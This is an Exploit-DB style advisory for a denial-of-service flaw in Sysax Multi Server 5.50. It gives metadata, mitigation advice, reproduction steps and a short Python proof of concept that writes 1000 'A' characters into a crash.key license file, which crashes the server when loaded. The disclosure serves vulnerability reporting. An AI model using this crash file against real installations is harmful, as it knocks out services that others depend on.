Vendor: Sysax Multi Server
By: Shailesh Kumavat
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 400
Product Name: Sysax Multi Server
Affected Version From: Sysax Multi Server 5.50
Affected Version To: Sysax Multi Server 5.50
Patch Exists: YES
Related CWE: NA
CPE: a:sysax:sysax_multi_server:5.50
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7
2020

Sysax Multi Server 5.50 – Denial of Service (PoC)

A maliciously crafted crash.key file causes a denial of service in Sysax Multi Server 5.50 when it is loaded through the software's "install license" option. The software crashes and does not run again.

Mitigation:

Ensure that the software is updated to the latest version and that all files uploaded to the software are from trusted sources.

Exploit-DB raw data:

# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC)
# Google Dork: NA
# Date: 2020-01-20
# Exploit Author: Shailesh Kumavat
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download.htm#sysaxserv
# Version: Sysax Multi Server 5.50
# Tested on: Windows 7
# CVE : [if applicable]

1) Download the software and install it on Windows 7
2) Run the software, then click install license
3) Upload the crash.key file and it will show a prompt to run this program again
4) The program crashes and never runs


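#!/usr/bin/python

# 1000 "A" characters, written to crash.key as the license file contents
buffer = "A" * 1000

payload = buffer

try:
    f = open("crash.key", "w")
    print("[+] Creating %s bytes evil payload." % len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except IOError:
    # Raised when crash.key cannot be opened or written
    print("File cannot be created.")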